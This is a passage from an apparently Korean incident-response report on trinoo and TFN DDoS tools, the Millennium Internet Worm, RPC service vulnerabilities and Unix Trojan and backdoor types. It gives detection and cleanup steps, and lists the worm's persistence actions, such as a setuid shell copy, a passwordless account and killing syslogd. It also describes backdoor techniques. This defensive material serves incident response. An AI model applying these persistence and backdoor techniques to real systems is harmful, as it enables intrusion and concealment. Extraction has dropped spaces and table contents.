55 보통 trinoo 데몬은주기적으로실행시키기위해서 crontab에등록시켜놓는경우가많다. 다음은매분마다데몬을실행시키도록한 crontab의예이다. *****/usr/sbin/rpc.listen 다. Tribe Flood Network TFN은 trinoo와거의유사한분산도구로많은소스에서하나혹은여러개의목표시스템에대해서비스거부공격을수행한다. TFN은 UDP flood 공격을할수있을뿐만아니라 TCP SYN flood 공격, ICMP echo 요청공격, ICMP 브로드캐스트공격 (smurf 공격 ) 을할수도있다. TFN 서비스거부공격은공격자가클라이언트 ( 혹은마스터 ) 프로그램이공격명령을일련의 TFN 서버들 ( 혹은데몬들 ) 에게보냄으로써이루어진다. 그러면데몬은특정형태의서비스거부공격을하나혹은여러개의목표 IP 주소를대상으로수행한다. 소스 IP 주소와소스포트는임의로주어지고, 패킷의사이즈도바꿀수있다. TFN 마스터는명령어라인에서 TFN 데몬에명령을보낸다. TFN 마스터는 ID필드와패킷의위치인수를가진 16비트바이너리값의 ICMP echo reply 패킷을사용하여데몬과통신을한다. TFN 마스터는공격자가제공한데몬들의 IP 주소목록이필요하다. 최근에보고된일부버전의 TFN 마스터는이 IP 주소들을숨기기위해암호를사용하기도한다. 또한어떤 TFN은 rcp와같은원격파일복사기능을가지고있어자동으로새로운 TFN 데몬을생성하거나기존의 TFN을업데이트하는데사용하고있다. td라는파일이름으로시스템에설치되기도하는데 strings라는명령을통해 TFN 데몬의실행파일을확인하면다음과같은내용을볼수있다

56 [ 표 3-3] TFN 데몬실행결과 라. 국내사례 trinoo는국내에서 8월 10일처음으로발견되었으며이후의침해사고처리과정에서대규모적으로발견되고있다. 국내모대학의경우 50여호스트에 trinoo 마스터및데몬이설치된사건이발견되기도하였다. 1 국내 A 기관사례 ( ) ㅇ A기관의시스템관리자가비인가된사이트에서불법적인접속을발견하고신고ㅇ침입자는솔라리스 rpc 관련취약점올이용하여관리자권한획득ㅇ시스템조사결과 cron을이용하여 tsolnmb" 라는 trinoo 데몬실행ㅇ위의 xx.yy 사이트에조사요청을보내결과를보고받은결과 tserver1900" 이라는 trinoo 마스터발견 2 국내 B 대학사례 ( ) ㅇ영국으로부터국내모대학의 20여개시스템해킹사고통보

57 ㅇ솔라리스 rpc 관련취약점을이용하여시스템침입ㅇ trinoo가사용하는포트와 rpc 공격에사용되는포트에대하여모대학네트워크를스캔하여전체 60여침해호스트발견ㅇ시스템침입후 trinoo master/deamon인 rpc.listen/httpd라는프로그램설치후실행ㅇ해킹당한호스트를이용하여국외특정호스트로 UDP flooding 공격ㅇ네트워크과부하발생ㅇ네트워크과부하현상제거 : 라우터에서 UDP 31335, 포트차단 마. trinoo 탐지및제거방법 1 네트워크감시 trinoo 공격에이용되거나직접공격을받게되면네트워크트래픽양이급속하게증가한다. 네트워크트래픽성능저하가급격하게발생할경우 snoop이나 tcpdump 명령을이용하여 UDP 패킷, ICMP 패킷, 또는 TCP 패킷등이증가하는가를검사한다. tcpdump를이용하여 trinoo 공격을탐지한예는다음과같다. [ 표 3-4] 네트워크에서탐지된 trinoo 공격 2 포트스캔을통한 trinoo 탐지 trinoo가디폴트로사용하는포트를검색하여 trinoo master 또는 deamon이설치되어있는지검사할수있다. nmap" 도구를이용하여다음과같이각각의포트에대하여자신의네트워크를스캔하도록한다

58 # nmap -PI -st -p m logfile your.subnet suhlet은 C class인경우 xxx.xxx.xxx.xxx/24, B class인경우 xxx.xxx.xxx.xxx/16과같이표현하면된다. 또다른방법으로는 xxx.xxx.xxx 와같이표현할수있다. # nmap -PI -st -p m 2766.log xxx.xxx.xxx # nmap -PI -st -p m log xxx.xxx.xxx # nmap -PI -st -p m log xxx.xxx.xxx [ 표 3-5] 포트스캔을통한탐지 trinoo 공격 또한 trinoo 공격은일반적으로 rpc 관련공격을이용하여설치하거나공격당한기관을찾아설치하는경우가많으므로다음과같이 rpc 관련공격을당했을경우나타나는증상을스캔하여검사해보아야한다. # nmap -PI -st -p m 1524.log xxx.xxx.xxx # nmap -PI -st -p 600 -m 600.log xxx.xxx.xxx 기술문서 CERTCC-KR-TR RPC 관련보안취약점및대책 참조 nmap 프로그램은 에서다운로드할수있다. 3 trinoo 제거네트워크스캔을통하여 trinoo를탐지한후시스템에서이프로그램을발견하고제거하여야한다

59 대부분의경우디폴트이름을사용하지만루트킷이설치되어있거나프로그램이름을바꿀경우찾아내기가힘들게된다. 하지만다음과같은방법을이용하여 trinoo를찾아낼수있다. ㅇ먼저일반적으로사용되는 trinoo 프로그램의이름을찾아본다. 이러한프로그램은일반적으로사용하지않는디렉토리에저장된다. master : tserver1900 deamon : tsolnmb, ns, httpd, rpc.trinoo, rpc.listen, trinix, rpc.irix, irix ㅇ crontab에서 trinoo의위치를찾는다. # more/var/spool/cron/crontabs/root * * * * * /dev/isdn/.subsys/tsolnmb > /dev/null 2>&1 ㅇ netstat 명령과 ps 명령을이용하여찾을수있다. # netstat -a UDP Local Address State *:31335 ldle 또는 *:27444 ldle... 또는 TCP Local Address Remote Address Swind Send-Q Rwind Recv-Q State... *:27665 *:*... Listen ㅇ lsof 프로그램사용 netstat 명령이나 ps 명령을이용하여 trinoo의존재를찾은경우다음과같이프로세스를추적할수있는 lsof 프로그램을이용하여 trinoo의위치를찾아내제거할수있다

60 2. Millennium Internet Worm 공격 가. 개요최근바이러스와같이빠른전파력을갖는웜 (worm) 형태와원격에서시스템을공격하고조작할수있는해킹기술을이용한새로운형태의해킹기술인 Millennium Internet worm" 이보안위협의대상이되고있다. Millennium Internet Worm은리눅스시스템의일반적인원격공격취약성들을공격하여접근권한을얻어내거나네트워크를통해전파시키는기능을가진스크립트및프로그램의집합으로최근의 Melissa, Happy99, Toadie, PrettyPark.B 등으로대표되는웜바이러스와같은자체적인확산기능과함께은폐기능, Scanning 기능, 원격공격기능, ftp를이용한침입기능등을포함하고있기때문에수시간내에많은시스템을공격할수있는해킹기술이다

61 이 Millennium Internet Worm은 1998년에발견된 ADM Internet worm(admworm) 과유사한형태를가지며여기에새로운원격해킹취약점에대한공격기능 (imap4 v10.x, Qualcomm popper, bind with iquery, 그리고 rpc.mountd services) 과다양한추가기능이포함된보다진보된웜이다. 본보고서에서는 Millennium Internet Worm( 이하 mworm) 의동작원리와특징, 그리고대책에대하여자세히살펴보도록한다. 나. 동작원리및특징 mworm의특징을살펴보기위하여먼저 mworm의동작원리를알아보도록한다. 웜은기본적으로 mworm.tgz의압축파일의형태를가지고있는데이압축파일을풀게되면다음과같이웜을초기화하는 wormup이라는스크립트가존재한다. 이스크립트는다른시스템에침입시에도아래와같이백도어를설치하는기능을자동으로수행하게된다. [ 표 3-6] mworm 공격패턴 1 /bin/sh을 /bin/.mwsh고복사하고 /bin/.mwsh의모드를 4755(setuid) 로수정 2 /var/tmp/.. 디렉토리를만들고 mworm.tgz 파일을 /var/tmp/... 으로복사 3 /etc/password 파일에패스워드가없는 mw 계정추가

62 4 /var/tmp/... 으로이동하여 mworm.tgz 파일의압축을품 5./mworm 실행 mworm 1 worm이실치된시스템의 IP 주소를제작자인 trax31337@hotmail.com로보냄 2 random하게선택된다른시스템을 scanning하고공격하여웜을전파시킴 ( 원격취약성공격 script : mwd-pop, mwd-imap, mwd-mountd, mwd-ftp, Hnamed) - tcp port 53 (worm exploiting BIND IQUERY vulnerability using "Hnamed") - tcp port 110 (worm exploiting Qpopper Overflow vulnerability using "qp") - tcp port 143 (worm exploiting Imapd Overflow vulnerability using "im") - tcp port 635 (worm exploiting rpc.mountd vulnerability using "mountd") 3./bd (tcp 1338포트를이용하여 millennium" 이라는 keyword를치면원격에서 root 접근이가능한 backdoor Daemon 프로그램 ) 실행 [ 표 3-7] mworm 공격스크립트 mworm 을실행시키면다음과같은기능을수행한다. perpare 1 /bin/ps를 /bin/.ps로변경, /bin/ps를 mworm 계정인 mw를보여주지않는새로운 ps 파일로대체, /bin/ps의모드를 755로변경

63 2 /var/tmp/mworm을 /etc/rc.d/rc.local과 /etc/profile에삽입 3 주요 mworm 관련파일들을 chattr 명령어를이용하여쓰기와수정이불가능하도록함 4 syslogd를종료시킴 [ 표 3-8] mworm 쉘스크립트 mworm은다음 myrand 함수에서결정된 random IP부터모든가능한호스트주소를순차적으로증가시켜 Scanning과공격을시도하는방법을사용한다. random IP에서순차적으로 까지 1씩증가시켜공격을시도하기때문에처음 random IP에따라서공격하는시스템수가결정된다. [ 표 3-9] mworm 의 myrand

64 다음은 mwr.c에의해 random하게만들어진공격대상시스템 IP를이용하여 rpc.mountd 공격을수행하는 mwd-mount 스크립트이다. [ 표 3-10] mwd-mount 스크립트 위와같은공격 script들은원격취약성공격프로그램 (ftpx.c im.c mountd.cqp.c) 을이용하여버퍼오버플로우공격으로공격대상시스템에다음과같은명령들을수행시킨다. [ 표 3-11] mworm 공격패턴 1 /etc/password 파일에패스워드가없고, uid가 2222인 mw 계정추가 2 /bin/sh을 /bin/.mwsh고복사하고 /bin/.mwsh의모드를 4755(setuid) 로수정 3 /etc/hosts.deny, /etc/hosts.allow 파일의내용을 null로만듬 mountd.c의경우에는추가적으로 /usr/sbin/rpc.mountd </dev/null" 의명령어를수행하여 mountd 데몬자체를사용하지못하게하여다른해커들이침입하는것을막는다. 또한취약한 qpop이나 imap등을새로운버전으로패치시키고 dns 서비스등도사용을하지못하게한다

65 이렇게만들어진공격대상시스템의계정을이용하여다시접근하고, wormup script를이용하여 ftp로 mworm.tgz을다운받고다시지금까지의수행을반복하여다른시스템을공격하게된다. 지금까지설명된 mworm의동작원리에서보는것과같이 mworm은최신해킹기술과 worm의자체전파성을가진심각한위험성을가진해킹프로그램이다. 다. 탐지방법시스템이 mworm에의해해킹당했는지확인하는방법은앞절의 mworm동작원리에서변경되거나생성된파일들이나디렉토리의유무를점검하는호스트기반의탐지방법과 mworm이이용하는특정포트의트래픽을확인하는등의네트워크기반탐지방법이있다. 호스트기반ㅇ /etc/passwd 파일에패스워드가없는 mw 계정존재ㅇ setuid를갖는 shell 파일인 /tmp/.mwsh의존재ㅇ mworm 파일들을포함한 /var/tmp/... 디렉토리존재ㅇ /etc/rc.d/rc.local이나 /etc/profile 시작파일에 mworm entry 존재ㅇ syslogd가예기치않게종료ㅇ mountd가사용할수없게됨 (mountd.c : /usr/sbin/rpc.mountd </dev/null) ㅇ dns service가중지됨ㅇ qpop와 imap이패치됨ㅇ /etc/hosts.deny와 /etc/hosts.allow파일의내용이 null로됨ㅇ.mwsh, mworm, Hnamed, remotecmd, mwd, mwd-ftp, mwd-imap, mwd-pop, mwd-mountd, ps ("bd" backdoor) 와같은프로세서존재 네트워크기반ㅇ trax31337@hotmail.com으로의 outgoing 로그존재 (mworm은 syslogd를종료시키기때문에다른메일로그, proxy 등을확인함 )

66 ㅇ xferlog등에서 로 mworm.tgz을 incoming한 ftpd 로그존재ㅇ tcp 1338포트를사용하는 backdoor프로그램으로의 incoming 트랙픽존재ㅇ tcp 53 포트의 outgoing 트래픽존재 (Hnamed를이용한 BIND IQUERY 취약성공격 ) ㅇ tcp 110 포트의 outgoing 트래픽존재 (qp를이용한 Qpopper Overflow 취약성공격 ) ㅇ tcp 143 포트의 outgoing 트래픽존재 (im을이용한 Imapd Overflow 취약성공격 ) ㅇ tcp 635 포트의 outgoing 트래픽존재 (mountd를이용한 rpc.mountd 취약성공격 ) ㅇ tcp 23 포트의 outgoing telnet 트래픽존재 ( remote층 을이용한 worm 전파 ) 라. 대책 패치설치 Millennium Internet Worm은특정시스템응용프로그램 (imapd, qpopd, rpc.mountd, named) 의보안취약성을공격함으로써전파되기때문에주요취약한데몬에대한패치를함으로서 mworm의전파를막을수있다. 하지만해커가새로운취약성을이용하거나리눅스시스템의의다른시스템을이용한 mworm의변종을만들어낼가능성이있으므로관리자의지속적인시스템관리와패치, 그리고최신보안관련권고문에주의를기울여야한다. Redhat 사용자를위한보안관련정보사이트 : 보안관리꼭필요한서비스만을사용하도록하고사용하는서비스에대해서는주기적인감시를한다. 마. 복구방법 mworm 이탐지되었을경우다음과같은방법으로복구가가능하다. ㅇ setuid가있는 /tmp/.mwsh 파일삭제 [/bin/rm -rf /tmp/.mwsh] ㅇ mworm/mw가생성한프로세스모두종료 [/usr/bin/killall -9 mworm/mv]

67 ㅇ mworm 관련파일들의 protection flag제거 [/usr/bin/chattr -R -ia /tmp/...] ㅇ mworm 관련파일들삭제 [/bin/rm -rf /tmp/...] ㅇ /bin/.ps파일을 /bin/ps로복사 [/bin/cp /bin/.ps /bin/ps] ㅇ /etc/passwd에서 mw 사용자계정삭제 [/usr/sbin/userdel -r mw] ㅇ /etc/rc.d/rc.local, /etc/profile startup script에서 mworm관련 entry삭제ㅇ bd" backdoor 프로세서종료 (startup script파일에서 mworm이삭제되었다면 reboot으로종료 ) 위와같은방법으로 mworm에대한임시적인복구가이루어질수있다. 하지만 mworm에의해공격을당한시스템은이미권한이침해되었으며, IP주소가공격자에게알려진상태이기때문에 rootkit과같은다른백도어프로그램이설치되어있을수있다. 따라서다음에서제공하는방법에따라보다심도있는점검과복구과정이필요하다. 복구관련자료링크 ftp://info.cert.org/pub/tech_tips/root_compromise (CERT's famous "Steps for Recovering from a UNIX Root Compromise".) 3. RPC 관련보안취약점및대책 가. 개요최근들어국내뿐만아니라국외에서도 RPC 서비스의취약점을이용한공격빈도가급격히증가하고있으며대부분의경우관리자의권한을획득하게된다. 특히국외모대학의경우하루동안 50여호스트 (Solaris) 가침해당하는사례가발생하였다. 국내에서도많은수의관련사고가발생하고있다. 여기서는 RPC 서비스에대한기본지식과최근사용되고있는공격수법, 그리고그대처방안을설명한다

68 나. 관련취약점ㅇ rpc.statd statd는시스템장애시 NFS에서파일복구를위해제공하는 lockd 프로그램을지원하는도구로클라이언트와서버의상태를모니터링하는 rpc 프로그램이다. 이프로그램은원격클라이언트의매개변수크기를체크하지않아버퍼오버플로우 (Buffer Overflow) 를통해루트권한에서만수행가능한임의의명령어를수행시킬수있다. 다음은실제 rpc.statd 공격프로그램소스의일부분이다. [ 표 3-12] rpc.statd 공격프로그램일부 위의코드를실행시키면공격대상시스템에 /tmp/blahblah 라는파일이생성된다. SUN automountd SUN 솔라리스시스템의 automountd는일반적으로 UDP나 TCP프로토콜을통해서패킷을받아들일수없지만 rpc.statd가포워딩해주는 TLI프로토콜을통해서는패킷을받아들일수있다. 공격자는이를이용해자신이실행시키고자하는명령어를 rpc.statd에패킷형태로보내실행시킬수있다

69 공격자는간단한명령으로공격대상원격시스템의 rpc서비스정보를얻을수있고, rstatd데몬의실행여부를확인할수있다. [ 표 3-13] rstatd 데몬스캔형태 다음은 rstatd 데몬이실행되고있을경우, automountd 취약점공격프로그램을이용하여특정명령어를실행시킨후루트로접속하는예이다. [ 표 3-14] automountd 취약점공결 rpc.ttdbserver ttdbsewer는 RPC기반의 ToolTalk 데이터베이스서버프로그램인데, 이프로그램구현상의오류로인해원격의침입자가루트권한으로특정명령어를실행시킬수있다. 이취약점은 SUN 솔라리스뿐만아니라 HP, IRIX, AIX등대부분의시스템에서도나타난다. SUN rpc.cmsd rpc.cmsd 프로그램은데이터베이스관리프로그램으로 Open Windows의 Calendar Manager와 CDE의 Calendar 프로그램에서사용한다. 침입자는이프로그램의취약점을이용원격에서임의의파일을쓰거나루트권한을얻을수있다

70 AIX automountd IBM AIX의 automound 프로그램은로컬 AutoFS파일시스템커널의요청을처리하는데수신된요청이실제커널로부터온것인지를검증하지않아로컬시스템의일반사용자혹은원격시스템의사용자가 automountd 서비스를요청할수있다. 이를통해침입자는원격에서루트권한으로임의의명령어를실행시킬수있다. IRIX autofsd IRIX의 autofsd 프로그램은 RPC 서버로 autofs파일시스템의 mount, unmount요청을처리하며, 지역파일또는네임서비스맵을이용하여마운트할파일시스템의위치를찾아낸다. 하지만로컬의일반사용자가 autofsd에조작된요청을보내어루트권한으로임의의명령을실행시킬수있다. 다. RPC 관련공격탐지방법많은 RPC관련해킹사고를분석해보면상당수가유사한공격방법으로피해를입고있음을알수있다. 다음은관련피해호스트에서수집한자료로서공격흔적을발견하는데도움이될것이다. ㅇ rpc.ttdbserverd 취약점을공격한경우루트디렉토리에 Core 파일이생긴다. ㅇ rpc.cmsd 취약점을공격한경우 /var/spool/calendar" 디렉토리에 callog.* 파일이생성된다. ㅇ공격자는 /tmp/bob 이라는이름의 inetd.conf 파일을생성하여또다른 inetd 데몬을실행시킨다 (ps 명령을이용하여확인가능 ). 대부분의경우 ingreslock(1524) 포트와 pcserver(600) 포트가사용된다. 따라서네트워크관리자는자신도메인내의모든시스템을포트스캔하여 1524와 600번포트가열려있는지조사함으로서피해여부를빨리파악할수있다. 다음은 nmap이라는프로그램을이용하여 Class B 네트워크에서 1524 포트만을점검하는방법이다

ㅇ로그파일흔적 - /var/adm/messages 파일 ㅇ공격자는 rpc 취약점을이용하여공격한다음자신의자취를감추고또다른공격을위하여다양한공격도구들을자동으로설치하고실행하도록하는다음과같은스크립트를사용한다. - neet.tar : update(sniffer), doc(inetd 백도어 ), ps( 가짜 ps 프로그램 ) 을포함 - leaf.tar : in.

71 ㅇ로그파일흔적 - /var/adm/messages 파일 ㅇ공격자는 rpc 취약점을이용하여공격한다음자신의자취를감추고또다른공격을위하여다양한공격도구들을자동으로설치하고실행하도록하는다음과같은스크립트를사용한다. - neet.tar : update(sniffer), doc(inetd 백도어 ), ps( 가짜 ps 프로그램 ) 을포함 - leaf.tar : in.fingerd( 백도어 ), eggdrop - 기타다수의스캐닝도구 (crackerm mns-v.75 등 ) /dev/sda69 디렉토리에파일을숨겨놓는경우가많이발견됨 라. 보안대책사용하지않는서비스는중지하고알려진버그는패치해줌으로써 rpc취약점관련공격을막을수있다. statd 패치를설치하거나 statd프로그램이동작하지않게한다. statd 프로그램을정지하려면 lockd 프로그램을 off하고재부팅하면된다

72 # chkconfig lockd off # reboot # ps -ef grep rpc.statd 패치는 OS 별로다음과같다. SUN automountd rpc.statd과 automountd을다음과같이 OS별로각각패치를한다. Solaris 7 은패치되어있다. automountd:

73 Solaris 2.6 과 7 은패치되어있다. rpc.ttdserver /etc/inetd.conf 파일에서해당서비스를코멘트처리하여서버를실행시키지않도록한다. 그리고 OS 별로패치를설치한다. rpc.cmsd 다음과같이 OpenWindows와 CDE 패치를설치한다 AIX automountd automountd 사용을중지하고패치를설치한다

74 4. 트로이목마와백도어분석및대책 가. 개요트로이목마프로그램은정상적인동작을하는것처럼보이지만실제로는다른기능을하는프로그램을말한다. 트로이목마프로그램은시스템파괴, 침입사실은폐, 재침입을위한백도어등다양한기능을할수있다. 특히, 트로이목마가백도어 ( 일명뒷문 ) 로사용될경우, 정보시스템에접근하기위해반드시필요한인증과정을거치지않고불법적인시스템접근을허용해주거나, 자신의침입흔적을숨기기위해서설치한다. 백도어 (back door) 는시스템설계자나관리자가시스템에고의로남겨둔보안허점으로서일종의트랩도어 (trap door) 이다. 이러한백도어는항상악의적인의도만을위한것은아니고, 필드서비스기술자나제품공급사의유지보수프로그래머가시스템에접근하기위한경우도있다

75 [ 표 3-15] 대표적인트로이목마와뒷문프로그램사례 분류 뒷문프로그램명 비고 trojaned login 매직패스워드를사용, 로긴후로그를안남김 trojaned inetd 외부에서숨겨진포트에접속허용.rhosts. /etc/hoste.equiv 패스워드없이모든호스트의접근허용 /etc/exports 외부에서파일시스템접근허용 trojaned rshd, rlogind 매직패스워드를사용, 로긴후로그를안남김 trojaned tcpd 특정 IP에대해무조건접근허가원격 trojaned telnetd 매직패스워드를사용, 로긴후로그를안남김접근 backdoor daemon(inetd 이용 ) /etc/inetd.conf에백도어심음 backdoor daemon( 영구데몬 ) 백도어데몬프로세스를특정포트로생성 backdoor daemon(rc 파일이용 ) rc 파일에백도어데몬심음 hosts.allow/hosts.deny 특정 IP나네트워크에대해무조건접근허용 trojaned fignerd 외부의접근허용쉘을띄워줌 기타 trojaned daemons 각종데몬들의소스를수정하여백도어가능 내부사용흔적삭제 관리자권한획득 trojaned w, who trojaned ps, top trojaned ifconfig trojaned finger trojaned netstat trojaned ls trojaned du trojaned syslogd trojaned tcpdump trojaned shell trojaned chfn trojaned chsh 특정사용자의정보를숨김특정프로세스의정보를숨김스니퍼링탐지를방해특정사용자의정보를숨김특정 IP의접속정보숨김특정파일이나디렉토리숨김특정파일이나디렉토리숨김특정로그내용숨김 특정 IP 의접속정보숨김 부팅화일들이나보안취약점을이용생성일반사용자가루트가되게하는백도어루틴내장일반사용자가루트가되게하는백도어루틴내장 침입을위한백도어프로그램들의주요기능은다음과같다. 1 모든패스워드들을바꾸는등관리자가안전하게관리하려고함에도불구하고시스템에침입할수있다. 2 발견되지않고시스템에침입할수있다. 대부분의백도어프로그램은로그를남기지않고, 온라인으로들어와이를발견할수없다. 3 시스템에최단시간에침입할수있다. 나. 최근발견되고있는트로이목마프로그램들최근유닉스시스템뿐만아니라윈도우즈시스템에서도각종트로이목마가등장하고있어주의를요한다. 다음은최근에발견되고있는트로이목마들이다

인터넷익스클로러 (IE) 의거짓업그레이드최근에마이크로소프트사의 IE 웹브라우저를무료로업그레이드하라는전자우편이광범위하게배포되고있다. 그러나마이크로소프트사는패치나업그레이드를전자우편을통해서제공하지않고전자우편을통해서는보안게시 (security bulletins) 만을보급한다고한다. 메일메시지에는 Ie0199.exe라는실행프로그램이첨부되어있다.

76 인터넷익스클로러 (IE) 의거짓업그레이드최근에마이크로소프트사의 IE 웹브라우저를무료로업그레이드하라는전자우편이광범위하게배포되고있다. 그러나마이크로소프트사는패치나업그레이드를전자우편을통해서제공하지않고전자우편을통해서는보안게시 (security bulletins) 만을보급한다고한다. 메일메시지에는 Ie0199.exe라는실행프로그램이첨부되어있다. 설치후에그프로그램은몇몇시스템에대한수정과다른원격시스템으로의접속을시도하게된다. 트로이목마의한버전은다음과같은메시지를보낸다. 위와같은메시지는실제마이크로소프트사가보낸것이아니다. 다음위치에있는마이크로소프트 IE 웹사이트를참조할것을권유한다. 트로이목마버전의 TCP Wrappers TCP Wrappers는유닉스시스템에서네트워크서비스를필터링하고모니터링할수있는도구이다. 최근공격자에의해소스가변경되어트로이목마가숨겨진 tcp_wrappers_7.6.tar.gz이배포되고있다. 이트로이목마는 1999년 1월 21일이후, 몇몇 FTP 서버에서발견되고있다. 트로이목마버전의 TCP Wrapper는소스포트가 421번을가지고있는접속이시도될경우 root로의접근을허락한다. 또한이트로이목마버전은컴파일도중에사용자계정과시스템의정보를 whoami' 와 'uname -a' 를이용하여얻은후의부에전자메일을통해발송한다. 따라서이트로이목마버전의 TCP Wrapper가동작중인호스트에공격자는시스템관리자권한으로불법침입이가능해진다

77 트로이목마버전의 util-linux util-linux는리눅스시스템을위한몇몇기본적인유틸리티를포함하는배포판이다. 1999년 1월 22일에서 1월 24일사이에최소한한 ftp 서버의 util-linux-2g.tar.gz 파일에트로이목마가있다. 이트로이목마는미러 FTP 사이트를통해서도배포될수있었다. 트로이목마버전의 util-linux에는 /bin/login이수정되어있다. 이수정된코드는공격자에게호스트이름과로그인한사용자의 uid가포함된전자우편을공격자에게보낸다. 또한어떤사용자에게명령을실행시킬수있는로그인프로포트를제공해주도록수정되었다. 트로이목마가설치되었는지확인하기위한빠른방법은다음의명령을실행시켜보는것이다. $ strings /bin/login grep "HELO" 실행결과아래의결과가나타나면트로이목마버전의 util-linux-2.9g이설치되어있는것이다. HELO 실행결과아무런출력이없으면트로이목마가설치되지않은것이다. util-linux의개발자에의해서제공되는사이트에서안전한파일을받을수있다. (ftp://ftp.win.tue.nl/pub/linux/utils/uti1-linux/uti1-1inux-2.9h.tar.gz) 다. 백도어의종류트로이목마프로그램은시스템에대한재침입을위한백도어로사용하기위해시스템에설치하는경우가많다. 다음은대표적인백도어들의종류이다. 패스워드크래킹백도어유닉스시스템에접속하기위한가장최초이고고전적인침입방법으로백도어들은패스워드크래커를실행한다. 이방법은취약한패스워드를가진계정을알아낸다

78 이러한계정들은시스템에침입하기위한백도어의가능성을내재하고있다. 침입자들은취약한패스워드를가진사용하지않는계정들을탐색하여그패스워드를어려운계정으로바꾸어버린다. 시스템관리자가유추가능한취약한패스워드를찾아사용을금지시키려해도이미이러한계정을찾을수없는상태가된다. Rhosts + + 백도어네트워크에연결된유닉스시스템에서사용의편리성을위해 rsh, rlogin 등의서비스를많이사용하고있다. 이명령어들은호스트이름에의해인증이이루어지고추가적인패스워드를묻지않는보안취약성을내재하고있다. 침입자는어떤사람의 rhosts 파일에 + + 넣어어떤호스트의어떤사용자라도해당사용자로패스워드없이들어올수있도록한다. 많은침입자들은 NFS가홈디렉토리를모든호스트에 export하고있을경우에이방법을많이사용한다. 이계정들은시스템에침입할수있는백도어가된다. 시스템관리자가 rhosts 파일에서 + + 를검사할수있으므로, 침입자는여기에자신이해킹한다른계정을등록함으로써발견가능성을줄인다. Checksum 과 Timestampe 백도어침입자들이실행파일을자신의트로이목마버전으로교체시키는경우가있다. 많은시스템관리자들은타임스탬프와유닉스의 sum 프로그램등과같은체크섬값에의해실행파일의변경유무를진단한다. 하지만침입자들의기술도발달되어트로이목마프로그램의타임스템프를원래파일의타임스템프값으로생성시킬수있고, CRC 체크섬값도원래의체크섬값으로가장할수있다. MD5 체크섬은이러한임의적인가장이불가능하므로무결성보장을위한도구로권고되고있다. Login 백도어유닉스시스템에서 login 프로그램은사용자가텔넷을통해시스템에접속할경우패스워드인증을수행한다. 침입자들은 login.c 프로그램을수정하여특정한백도어패스워드가입력될경우관리자가어떤패스워드를설정해놓든지에상관없이로그인을허용하고, utmp나 wtmp와같은로그파일에기록도하지않도록한다. 침입자는침입한흔적을남기지않고시스템에로그인하여쉘을획득할수있다

79 시스템관리자는 strings" 라는명령어를사용하여 login 실행프로그램에백도어패스워드의유무를점검하기도하지만, 침입자들은백도어패스워드를암호화하여저장함으로써이러한명령어에의한발견을피할수있다. 가장좋은방법은 MD5 체크섬을이용하여이러한백도어들을탐지해내는것이다. Telnetd 백도어사용자가시스템에텔넷접속을할때, inetd 서비스가그포트를리슨하고있다가 in.telnetd에연결시켜주고, in.telnetd는 login 프로그램을구동한다. 어떤침입자는시스템관리자가 login 프로그램을수시로점검하기때문에아예 in.telnetd를수정하는경우도있다. in.telnetd는사용자들로부터터미널종류등몇가지사항을점검한다. 일반적으로터미널은 Xterm이나 VT100으로설정되어있다. 침입자는터미널종류가 letmein" 등특수하게설정되어있을경우인증과정없이쉘을부여하도록 in.telnetd를수정할수있다. 침입자는어떤서비스에백도어를설치하여특정소스포트로부터오는연결에대해서는쉘을부여하도록할수도있다. Services 백도어대부분의네트워크서비스들즉, finger, rsh, rexec, rlogin, ftp 심지어 inetd 등은백도어버전이존재한다. 이프로그램들은 uucp와같이전혀사용되지않는 uucp와같은서비스를백도어프로그램으로교체하여 inetd.conf 파일에등록한다. 관리자는시스템에서어떤서비스들이제공되고있는지항상점검하고, 원래서비스가수정되지않았는지 MD5 체크섬에의해서진단해야한다. Cronjob 백도어 Cronjob은유닉스시스템에서특정프로그램을특정시간에구동될수있도록한다. 침입자는백도어쉘프로그램을 cronjob에추가하여새벽 1시에서 2시사이에구동되도록할경우이시간동안침입자는시스템에접속할수있다. 침입자는 cronjob에서전형적으로구동되는합법적인프로그램인것처럼가장한다

80 Library 백도어대부분의유닉스시스템에서는공유라이브러리를사용한다. 공유라이브러리는같은루틴들을재사용하여프로그램의크기를줄이기위해사용한다. 어떤침입자들은 crypt.c나 _crypt.c 프로그램같은루틴들에백도어프로그램을넣어두기도한다. login.c는 crypt() 루틴을사용하게되는데백도어패스워드가사용될경우바로쉘을부여하게된다. 관리자가 login 프로그램의 MD5를점검한다고하더라도백도어코드를찾을수없고대다수의관리자들이백도어의근원지를찾아내기가상당히힘들다. library 백도어에대한대책은 MD5 체크섬점검기를정적으로연결하여시스템에서구동하는것이다. 정적으로연결된프로그램은트로이목마의공유라이브러리를사용하지않는다. Kernel 백도어 kernel은유닉스시스템이운용되는핵심이다. 라이브러리에서사용되었던같은방법으로 MD5 체크섬을우회할수있다. 잘만들어진백도어가설치된커널은관리자가찾기가장어려운백도어일것이다. 다행히커널백도어스크립트들은널리쓰이고있지는않지만아무도실제얼마나배포되어쓰이고있는지모른다. 파일시스템백도어침입자는서버로부터획득한전리품과데이터들을관리자에게발각되지않고저장하고자한다. 침입자들이저장하는파일들은일반적으로해킹스크립트의도구박스, 백도어들, 스니퍼로그들, 전자우편메시지들과같은데이터, 소스코드등이다. 침입자는특정디렉토리나특정파일을숨기기위해 ls", "du" 그리고 "fsck" 와같은시스템명령어들을수정한다. 그렇지않으면, 숨기려는부분을 bad" 섹트로보이게하고, 침입자는숨겨진파일을오직특수한도구를통해서만보이게할수도있다

81 Bootblock 백도어일반 PC에서는바이러스가 bootblock에자신을숨기고대부분의바이러스백신은 bootblock이바뀌어졌는지를감시한다. 유닉스시스템에서는부트블럭을점검할수있는소프트웨어가거의없어, 침입자들이부트블럭공간에백도어를숨겨두기도한다. 프로세스은닉백도어 (Process hiding backdoors) 침입자는그들이구동하고있는프로그램들을숨기려고한다. 그들이숨기려고하는프로그램들은일반적으로패스워드크래커, 스니퍼프로그램등이다. 아래는프로세스를숨기는몇가지방법이다. ㅇ숨기려는프로그램자신의 argv[] 를수정하여다른프로세스이름으로보이도록한다. ㅇ침입자는스니퍼프로그램을 in.syslog와같은합법적인서비스로이름을바꿀수있다. 관리자가 ps" 등으로어떤프로세스들이구동되고있는지점검하면정상적인이름들이나타나게된다. ㅇ침입자는라이브러리루틴들을수정하여 ps" 가특정프로세스를보여주지못하게할수있다. ㅇ백도어프로그램을패치하거나인터럽트 driven 루틴들을삽입하여프로세스테이블에나타나지않도록할수있다. ㅇ커널을수정하여특정프로세스를숨기도록할수도있다. Rootkit 백도어를설치하는가장인기있는패키지중의하나가 rootkit이다. rootkit에소개된전형적인백도어용프로그램들은다음과같다. ㅇ z2 - utmp, wtmp, 